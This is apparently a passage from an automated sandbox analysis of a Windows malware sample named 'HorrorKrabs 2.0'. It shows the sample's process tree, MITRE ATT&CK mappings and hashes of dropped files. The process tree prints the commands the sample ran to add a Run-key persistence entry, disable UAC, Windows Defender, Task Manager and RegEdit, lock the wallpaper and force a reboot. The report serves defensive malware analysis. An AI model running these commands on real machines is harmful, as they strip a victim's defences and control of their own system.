- Suspicious use of SetWindowsHookEx
PID:2780

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\HorrorKrabs 2.0\" -ad -an -ai#7zMap1011:90:7zEvent5021
1⤵
PID:408

C:\Users\Admin\Downloads\HorrorKrabs 2.0\HorrorKrabs 2.0.exe
"C:\Users\Admin\Downloads\HorrorKrabs 2.0\HorrorKrabs 2.0.exe"
1⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- System policy modification
PID:2124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UpdateManagerSys.bat" "
  2⤵
  - Drops file in Windows directory
  PID:2732
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FreeSteamKeysGenerator2024 /d C:\windows\update64\krab.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update64\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:324
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:368
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:4752
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2792
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    PID:2872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      PID:2484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - Modifies registry key
    PID:3508
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    PID:4684

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aec855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

Filesize
24KB

MD5
e1831f8fadccd3ffa076214089522cea

SHA1
10acd26c218ff1bbbe6ac785eab5485045f61881

SHA256
9b9a4a9191b023df1aa66258eb19fc64ae5356cfc97a9dda258c6cc8ba1059ac

SHA512
372c486ac381358cc301f32cd89b7a05da7380c03fa524147c2ddf3f5e23f9b57c17485aaedc85b413461a879afc42e729547b0c96c26c49bbdb7301cd064298

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

Filesize
44KB

MD5
a4b04ba2b9a56f5911fee0c29629e53e

SHA1
939e8e65e22ae978a6b63dd1400fc6f58c5015eb

SHA256
523d8983d24e050e6e7e1f43d0caca6bd77bef38ec046d181b13bf32702fc025

SHA512
1c3357e9ecd3ac0de53d14f5d4c8d8d0aeafd30cb2e0dd6cfd1be68cca4fd4e178e79938a5ffe9a17b43e4f60f6e8e08c1054fa44160377fea740da70761c80f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020

Filesize
48KB

MD5
0c2234caae44ab13c90c9d322d937077

SHA1
94b497520fcfb38d9fc900cad88cd636e9476f87

SHA256
d8e6f62282e12c18c930a147325de25aef1633a034eaf7a3ce8de1fb8de09912

SHA512
66709f74b19499df1e06700e1c257e14a82ca4287194e4b177b3f333748d927f413c8c459a35e7e5a2f92d28410b0129f106d94e3dd85bc0dd0b986add83b18f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028

Filesize
21KB

MD5
9ccb3e387ecf1d1c32d33a33b61db8f3

SHA1
9d6625afcaa4d6bfe223268ccf82ff32ea9532a3

SHA256
3d34b64d0099f608de0e555d46338252a99d36f2a25af7180702c9966621fa0b

SHA512
05c3d41fd4115bd66c1a938ad644424f8df93f96ae27004c800e43acbc4b23568456574ceba605ea696fb594585811fedd0f9ec547a697344479e4d7516f65f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
8183ed8462166d705de95fa694344cf1

SHA1
b67eed5b52b8a7a0d41243dc9385c8b272f5251f

SHA256
143086510cb95fbf46fa50e2608ba7848b647b34597ec2e789abaefcb538c879

SHA512
fff23d1e12b46f33da5173903a3eed95716786516eb8706466f6c266baf657f738f5ad50cdc7d862703d73a64297292d75d6a2ba51f6e361ff8d6807a09df3ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
18d88c6efb169700a594ba6ccab0d293

SHA1
3f39c521af83fa57330752d9a5b9c9b27fe10dfa

SHA256
133c1dc20edd90807b9cdd6d40a4291770a4bf44c266c470137a2d4a923e4c18

SHA512
c1711764c4168b7c3cbe19b95e2dd2e0ab2af87f0e66d0ae13b88b859f302a473e7a5ac55f8d27c2d83fa4bede4c47340ccbbedd679386a0b81a1f4dd25a8bdd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
3146f9dadd43ebbf0fa4788350623930

SHA1
f1991888e4023c82f40025868a0caae9c6d4f85c

SHA256
0ae95de1c8f7526bc482017b4befba5c2378974b5acc7155d37a801d602b4560

SHA512
f6895091cbf8e58b6b47feb43cbedbf6964c19cf98e61161fadc3d6756af43aa45e79ab38646662f3a43b2355fdeca2387d42b910e37024d685e3b78a4c4e89f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
03fa417c6c85507d9b68e12a14c487e1

SHA1
68794a4476e2c4749b996dc39e62afba01063f0e

SHA256
dfeafb8cf9a8cc15fddc18de49d24896d49a54a070f5e928752e88c06413de7f

SHA512
1e692b35bf4a746cb5e09a9eb2d42b54879871fd7a5b1f074d33f225fc153ba7da5b91e22530e7dd005e282544615699322d8f3da8e0bdad44a74d700341e429

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
17eb42ad965a425f6ca715e8067c71ed

SHA1
c7f8cfc460b3cbd9badd03907b1099c0104d9849

SHA256
bf4740e901f59a742def45a4cacfd5543523203830b2f9bb313c79c0d377b626

SHA512
139d7be399492d0ed5facdc1c8647333cb29d27e258f3db9bd04bf3036c20eeaad4ddda02f178b278881158d81588fd78dc39c6fac349c8ce5fdff36a98efd31

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
ea335180ef8a8e06640691cae1a6f7a9

SHA1
baf01f45400aeeb3528956b3ea695f21687ee797

SHA256
a9a07bfb369b0fe1f2c6bb6ccd7fc6763e04a1de6c8540c99470cddad66d6c6e

SHA512
4a04759229b716fceda5972f9c1ae27d6d77d5b3e368dd976a91dc66bfa438f753376ba85f629a5a76ac5c9bd27293c5b78702fa5249cc42f12033a612e2143f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
de33bd86b7a3e4ca92dfd8ce56477c38

SHA1
f1da02b4cfb300933148057291fa4bfb60bca3e5

SHA256
05fe2b0c0da210a44cd120bf0886c29891c9331dc5d94fb337acdeec1d0d8ac9

SHA512
729f38aec756d5f4c31101502e5b88ec9210d0e28d716509013e453c25457c5e21ea517bfefbade3a145a36d14129b6812dfc328685792086db9fe07afa1e0e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
30ea93636093d363589d12355bea25ee

SHA1
c1083c2df4b491116d7aad38ef189268ec8f9209

SHA256
70337055b515004cadcada10ce483b475b34436afa7016a816d4186f2fb2e8f0

SHA512
3b7cf7fe03809233628ea965454c420617fcef617b2e0bc1bef7a1fc719c5e8c77d23b7c62be31d44de304b42cca51ebe866740b38c3e33a42ee9d4dde9e378a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
a7eb18fe8051f93e75eb0c424900a55c

SHA1
33a402603d682e5f2da49d5a75c2778fe5ca6bac

SHA256
3cd27b6c1fca6ccf917a356eac2d7917e6009a55170a1f7e5f2a6a17d85a9733

SHA512
2fabd5b939dcc07d5f9eb30399d8ccbe0165c34550949d4f3d37f76ef1cbb66c5f8a864102023c68d124e091f93ecd5036f38be8fa184202cc130ecab880f93e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
77cf798817bac490f17666ac41d1062a

SHA1
579ac4df52ea6b6467992f4f1d477443390d9d04

SHA256
8ae62ce97ff15eca85328fa29918f8b18dabb4b5ed82c6c9909c8ae08f24bb68

SHA512
f9b2ed727cb008cc53f987391b604db5ff6b0f88e3ea33d77b1d3cf972eb5e3d6e193d89bf12dde0d563991768520f9a45778b4549309c8cd69e314f4f37e158

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
99c7e5dffdc1f14ef5d3a8f7a1e8c6ba

SHA1
9be5b3207ad953e8889b2971e596c660ea15a37e

SHA256
ab252c127537438056f2f4edf0ff58c7f352bdd93ad7f169615686bc0c0fa63b

SHA512
7670f57387ebd84e6ee1ddd2cd0e69727814e87026cb23a2ed7edceee65b0fb6c513665e2a80217c86cdf4c38b31ff3985508f26a3d481e64cd6f5db0fa5e8a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
e1f18ef9c6e83d12aa71f3bdf7204054

SHA1
73562d80887da6fdc6e951e979c783f86711725e

SHA256
aec8384e26b43aa0e428b2837a51110cea9abf00307ba761daa1d79bbd421aad

SHA512
06c6c338f9ebb66af4a106ee131960fd87fe4cf0fcb9f6dec5548c24d205ece9cb00b0f7c1e2da18f020b366be5c73350297ee80f8ce4b6f064e309bc5f5b326

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
8883bc802809a6b249dbdedc5f160d9d

SHA1
30792dfdf501e2a0f6778bc30b2fed792f7ea7c7

SHA256
a2ef7744284368e8806342ef706b45f68dd16ebdfb96c3c59d3e33cc8f5f57ea

SHA512
3bf6180e75c46174e71b76e58c526ccb5af7a20ccf1b43a371c63ff57a9b2952b576954aa4fcc51df353c66c3ef6ad68c42ce6e3d05a4e4e9408c35d5fadba31

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
8ac9c67e8ff1e238960a8b649d53fdd6

SHA1
fd40b83328759a362bb009e87b74dc29cfc61cae

SHA256
d41444d4ecef7fc5a0273db577e3d18ba2b6f9b47d955f44bc247f7a9053ac69

SHA512
546b6f15b7988bcdff4a716c07b703ca6a243562e4416136a3133c4481e94379b60d90d3921b1fc36768046ec7314bd0b6c73f0090aeae417f2edb3f9ad58889

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
692f720d52eaa9e2a9023adfb637969a

SHA1
1678583e27d48233d8551d4a8f8abc7d5e441384

SHA256
64b70f1f76b9a29a26c675dbc05d5ce07f1f81903234aa9cdac3f36bb3f37cc2

SHA512
8e5b3b27183ca1b7c970d363e7f190ddfc12e0c1bc2480bcbdcf175f8fb8113e2e005f1e2eeb43b467061c14111d984723d0c7e7c60bdff817b7504d699016e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4b58281d9070e8f46098e8e76c8ef10e

SHA1
603467071f35275e44562e58c900db2df3c3b8ff

SHA256
a1410fe63c48c59636cf9d67ae387b2e7435e0a5f9c8495cc4ee6d5845d03366

SHA512
f89dc0696975a02d77e27599546974ccd7858ba5d7b1dd0ad4a75d814b2d872e6a8d2654de611d5f2db1eea352458683aa5ede3ff90efdda41cd5d623d78ea20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
331b214ae927b9d8acf3691a8ad94bfb

SHA1
282f3607a1b89ecc21f51934ccb962a199929b1f

SHA256
ba4ebb2148808472bd7f2b1e6a7ce899ae250ad32b6c6325d42f5490734475dd

SHA512
cf3b222073997d2549ff48636cde3cc6ae8b5f5343b270801e01a24a2fe5f4992a564cadfb9e69c0bfce17fc58501d47af1a55436fb4a60c074dae46c5355991

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
761ecf9e52fd410c23fc1137c2fbe467

SHA1
2ef9d528667a89d3f08a956dcbd8346cc32b708b

SHA256
1c1ee073f24202a9d16b5191e9fb19acba3a02e4248bcfe80e4256d2e9c587a3

SHA512
1af2d055a904f6bb74465aa411a9e6bb18f0144dcdb1fe237f894921e0da50bd0dcda5b59fcfa1f9a5a7749b383b3d4202f8f0582c399cab3acbc83b6d0ce7fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
242ec5f561c2e49c4f72103d565bb028

SHA1
1045b53fb54ed7c4bf533dd9162252fca60e4a1e

SHA256
58289fadb93852b45210d82ad64eadd979ea73cc82d745ed6008c88405c1469d

SHA512
ee1ed73a60bc48fb7ca55fe71239f1110f1e86681836e07848ccc32c4e49d155a54b93d71aa9f088a844e4607186bb1a49ba0884cfb43ae0531a6b3d46dbe45b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
fe9cb10194fab7f43888e7fae243ad73

SHA1
eb58b21431fbac4bed951d37a022fefc81d82937

SHA256
c8004df57bb188ab5473946df500e31021f8f8c099fda10f73bf0b8e50edd10d

SHA512
42207744576976986fad3c3f076b5a9ce6bde4a58cc339e0cefe5a9d72bbb09caddcd544a954a6803b1376e55e65207e0ca0825a42a1d1c0910ac4d590fa686f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
cea145998cfdd104d8ed7fddfff5824d

SHA1
5bb4f54092ecb71fe11a3bb631ce0b77426a70e6

SHA256
bd9d2938aaf92b1fda312c259d04c22d3cbc371e4cf8d54f8c6a0be920aa7775

SHA512
ef62c9df32768e4c18c7fbfef0d50d555aa7aa6df51890c12d80d2aae316f51b452bcd7c69c6ca159b9a831fa8673ff2c89154709f1f2db7d918dcd9cd4b77c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7785fab7629b1972941c154cf728f6ae

SHA1
56a354510d9ef00fa145afc65ed0d8e49c7c0798

SHA256
dfa0a9e7db8483982c20b060ec1d1e8b655066397058ca469eb5082ddbd1ac55

SHA512
fdf3c9bbb195a77d3314f01785ee98fd5fc133a103cdd7a73f4db26d650e4e902d88ff81d646d44c7bcd0127a93c58fb7ecd84950829ed9d585e4076612a908a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
5d22762ac7839072af696407ff8447d3

SHA1
e4dd63688e4e97a53100e7160be1c9a95341eca1

SHA256
c15a6f88936062fe12400c0ecd102f64c263010e0a25f92e619b4ade1976c0f0

SHA512
72ecea9d5040eb71daaa26ace20d612bcc126816cb415867d6de1c06e606ef70f6cbe261d458edf747751159027e125e7fed54aa76166501a85dc185f5f6cd98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
ed398bf2e17b1c5519eb91a8eab3d504

SHA1
b90bd329b1b087ccd88fe97682794410be2fd05c

SHA256
122a5e9a74039dd96db7d4cf4fe4a38f5d8692de78d46ab5ed43291fda4056bc

SHA512
3a049fa6046d4c7e78787226eae163880f6dd5ba745cae1438119e548ae5157d338609b7701636df3ac042423c13971c6b1f9edaa36978a46f755e1e8c964354

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
7a59e6d91d01370a40a89735f44970b8

SHA1
52e1cb2aed73ddc126181bce3ae18b5a1f3192e8

SHA256
b435b2da4a15c956212c2bb13a385e70fd977cbf82b180df4034d61c077622a8

SHA512
a4fc251a4dc1c917172c96b7f7093931265dd4b1e4761ab93f4a640a0c13be6954037648073a9801913cf135ac0501f45879d937778c40f00ef54566ba18aba0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
f98e2d90e833737a0eacac546c4fe854

SHA1
f6272988db188b4a0f3bff667ba9ae92c64a2fc4

SHA256
4569b4055fa6c28e7fa07c3d1f65033cc66dadb9d93ccff9bd766170b6f8d7b3

SHA512
89a4dd9b62272f11d16d76a429a3feb5091a517fa05b64e1c848c3cfa64044161fb7bb3ce693fd30b42db39ee8ac31e2da584d5f84d5965f9431e58427d082f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
fda44299a89fb32849034dbde3fbea2f

SHA1
4d6fd657d17e6b88a0d147a5fc520ce4e0f1b032

SHA256
d9a271e04aba7c231248724aacbaa03c9f893586dd5cb45ad517854c5358c6f8

SHA512
6186ffb04ccb9c528d1aa1ad012c18e8454f60899bc02f0f6d20178d413a5de48a44710d52624826593c0f463af7a8d44177f1160ee3c5f197bd5eee6e401a12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
cdcfe978967c0cca3b74747f14553980

SHA1
831eea7280121f2b13c572fe49a84eccc2c6c998

SHA256
2417fa506045c639469252492caaad7485c3fbe5d8b4f70aa1b689d7c898b7a9

SHA512
da87147367c070351725596abb07771fba92fc8e5f4d7f4c6a1d74ff52bb554a5c16c72fd8c006e4f0140a4412dd7abaea9062fb9cedc5016a0e94e7db9e73b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
54f41289ac9712e3204d2bcd623fcf43

SHA1
590b82ea980e9c8a1a9cbd4657148b8585ad40b9

SHA256
8265fc95b70e6539194a501ce5b7317ff6000a7096e5aac01c53ad4579b0d6b2

SHA512
67deece94f46cd9b7ccfb54e4bad0844461af5d4d310b46ddda54e3ba38d989b40bb7690c4fac973c6a2a130d06ed0e7911c2257e3414f3e548fb5efd4cfaac2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
78c84ca622dcb55ecdc189d6d2233c1e

SHA1
2771df7fc676096ed136d318a9fbe0ea61eda0eb

SHA256
ad63ef739e45bf109e32265e5d4a0de96082898a979835a64cb73a400def8167

SHA512
2189b906fb5c668991a8fe94977212528ec1daf79ba62934bede3f26ba850960e977919616e5242147e1152919e743a9821135a8da7d3fbddfe8c1969302a6d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
349ff4ac176986ba1630c0daf4a89905

SHA1
fbf235041e29373b3affeb5a5e3f291bdc8cd007

SHA256
5bbf06ccc431d9bd254cdeebf05c3bb0eb61507eeeaa7c5daeb1ac5ee0e60ef4

SHA512
301182912621b2a73b56f2c10a542401a3ae83d2dfe48cc8bd72d260e2159b8bebf239a6267f406f824299790a50f0674eecf7fd4f2393b62a0229aaaade516f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6b3090b5c281cfbf5e5c6ba3fbb33f12

SHA1
f5625a0581f2c8990bf2ebf86e622fba6232b8bd

SHA256
1a56d73140246a4da00f77e9181054262da2d294f35289df1dce351b420082af

SHA512
947827bff76effd4e3ac6e69d3635952b656bde532c864d50c8b44adb909564fe7e4007e40e8a00ecf80e519b871d80bce3f20947ee1cab593b146892cc14b1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
30f7e92c4b83a83f937aae64098cb9b3

SHA1
27e8c4f7c24b9c2a0744368f6b87bd5e35b56fad

SHA256
38742faabb9ff4f587b8e25a2a9ec6c5107e3e20cc9783640103f591a55b20ab

SHA512
11023a7384047ebe6ce6b4fa082680ee4a4eca6ef50df4db9f479b6fd1fa763eb2977b14110f9077f0beb776bb083860da7de9efd2071b91fed13516e93f9405

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\1bb53157-f4f3-4d7c-9ff0-ac3a6f54d561\10

Filesize
8.0MB

MD5
9ab373562ac888ec96ec55ad98f4bd35

SHA1
ed430cedd6332989fe7a60495fb6e0d928294183

SHA256
b47dc1861795c1b8bb3e690144d3d97e2fad0e00e305a3b9826485e89947e783

SHA512
dd2dc2c15a35b15ac05f16746ad6a29b1ecb0bd22e0f96f3e500410ee63aa27c5670e79948ffdd177279570e438bf87bd654eedc7cb7eada2caa430a924d2305

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
a6117ce9c25bafceb376f48d8f493b53

SHA1
6b90a8824444cf88153377e642bce25da29c30ee

SHA256
ab18e1f4688b97bf4fd88f19473ae63404de463af974ac4a717ba9e39fbd9416

SHA512
ec63f62c93db59151d7cac70aaf86e1d983bb9148638851b3f880c6d3a824665b94cfc36881a80ce4757166971ded97224e1402a356ec78e78acea90f72f0545

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
760263fae49fd6dd5cfca24b6de580a8

SHA1
e6979cf5d1e3ff7dfa1f3e02c5c84747ab9582bc

SHA256
5a8ef27a78c3d74e9427fff7c07450f725cfa34f59d953de95119767ea2bf83a

SHA512
6bddab7bb771964339d81b8066efe5920aa0b73db66c4d1bbe6e52a3bc633b5e5dd79fb2494ef5d5e18bfa690632d02c2cb97585d813ed320910eb69c5bd07b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
97KB

MD5
b9bd008431f8ae34cf4510d4b663229a

SHA1
10b469024370f57764584630cf12d7b8c8cbf8f5

SHA256
985dcd3479ef0526d492b51706826e16c477d02050f50a3d848c29a0727ca8ed

SHA512
079836889816e06bc14089b23be941a921a06061a13c5d6ce22e3e19c6b5e365e7595443f8f61ea8708979b177ffacac5ae82f83dd40bf8dba99c0acd51b0d59

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
105KB

MD5
44a10fc1c12291eadc400b76b603e002

SHA1
b00302b8a376c53dd206f3ea82ba693b100bfaca

SHA256
283ad5426090ed9d1acc7f9df1018da4d62b8a7153dc4c5165151d37a389abca

SHA512
e28519d6178e0d4ed13269d5a443ed3cd65d855a51f4e00ff92e900ffe12ac925bde6f8675d17d83a651b34c3b2390bb6d9107f3c307db7a572f1b59ced771d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
109KB

MD5
3919f3be21da650079f05fb2d1385fd3

SHA1
31195572646bba3d25da787bb6f9fcdad9236b10

SHA256
bbeb1c9d7eb0e7bfb09da3d9f6673de1d3bba54411714e98943f154270473dc0

SHA512
233230f77953f94cdcb1b983fa25853e74a69fb280761a029df4ae3f7a561e177d3d77de59a05d2796d781a0f9b88035865e39151707820a5072b37ea10d8a6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58946b.TMP

Filesize
92KB

MD5
1a5d58a67a988ee11ef400cb91b1f74b

SHA1
6b450bf07e0c27fda3e90157b87176a4f4854598

SHA256
8a773bb2d0598447174e91fb7bbde5f94837254a7235384e031230180fcbe0ae

SHA512
004f00eb45205e869a5ee7ad27ae60a94e17f33526cf6285204eb1b3926c4aa35a56b1718ff3970b57edbfd8e93d2390702ac21492b44d46e424b9885314f68d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\UpdateManagerSys.bat

Filesize
1KB

MD5
2a1166ef16d4517959ece3b1ea649f5c

SHA1
ec82ba78d6a13fbc157485575f39d14be91b0d69

SHA256
30e63a78b7aeffac7e3773b162f1dffa82ea44acfcf7275b111f2289ada225db

SHA512
e32be2a4fe3f43b4175650a51158a38892dcbe2096ff4ac9dc4cfaf1a3feb5af595fe336110dc4f85ccacb51969e00eba30c5cd473458735606a03bdda29ac59

Download Submit
C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
23.7MB

MD5
cb59608dd5da79b0429dbd3939bb1d90

SHA1
7c02cfdb637ac5f345e93e419aca8fa728d1050f

SHA256
5e5751dd362304782fa5ce2f390f496d3a138b1892c9be00b1054f4868a9b09d

SHA512
aa6566c43ac868117a8b161c2bdce9ab0097e7c4bd09969c5e73807f34da7404124614b589dcf3ef5411becfa283ac24427b2c1d2df4053328a5736ecdab1c41

Download Submit
C:\Users\Admin\AppData\Local\Temp\krab.exe

Filesize
19.5MB

MD5
12a04fcdb9130967747da4a3114adafa

SHA1
b4f6927606a1a022f1cb0e29ec9fab57b830146b

SHA256
4ec8a04c3468b877bfd2e4ffe35e001fcb08bd8ad9dfd09659e7cbd3eaaa8483

SHA512
e23877db9b74cbcc862ed08fe34541a7eaa36d01f3bb6d480458a130655350315754b5c84b1545d1e541ac601abbac98231a1b21ad90e54e6a0c8098affe220a

Download Submit
C:\Users\Admin\Downloads\HorrorKrabs 2.0 Source Code.7z.001.crdownload

Filesize
24.0MB

MD5
4e0e71cd12d7e640b917d2bde7b7d481

SHA1
3b960472c40df746d3b48ef6ac44dd3fc50c0302

SHA256
7790d961c020586d8f4bdb90157dc0d65e3888daebf21d7c72cfe42f3f5bace5

SHA512
9ecb4597c773ecbdc142d3d872baeb779a49ce65ad6f7217ac634d9bb0d2b736aed518d8896902636f22db48f0ce936c87294b92400636f07b82d9d1024f9d46

Download Submit
C:\Users\Admin\Downloads\HorrorKrabs 2.0.7z.crdownload

Filesize
12.5MB

MD5
00d464ff308214f411c9555b9ef1e4b3

SHA1
bb116c0b422c8a189d84f1f32e551eea3a56eb0c

SHA256
d6e705181b89db1a9a0bdda6f1834d8e67ccd31ba85cedac39d650f2a70b8544

SHA512
fc92a76fab77f4fd57a986746b9fc9be7972f206935f00146245b7941176bda45dc0aa06237592b4b832e75c396c00e2f96b3356a6998694aa82c0ecabb68125

Download Submit
C:\Users\Admin\Downloads\HorrorKrabs 2.0\HorrorKrabs 2.0.exe

Filesize
43.2MB

MD5
2812d95e5c13473c19f15fb222b39917

SHA1
e36f1b4dbc0e73bc2a68e1a0f913d1d078ffdcc6

SHA256
f75d2337bcf478874125007ccb29b2673b62af4ebd5190971ebb4cfbf3e6bc5d

SHA512
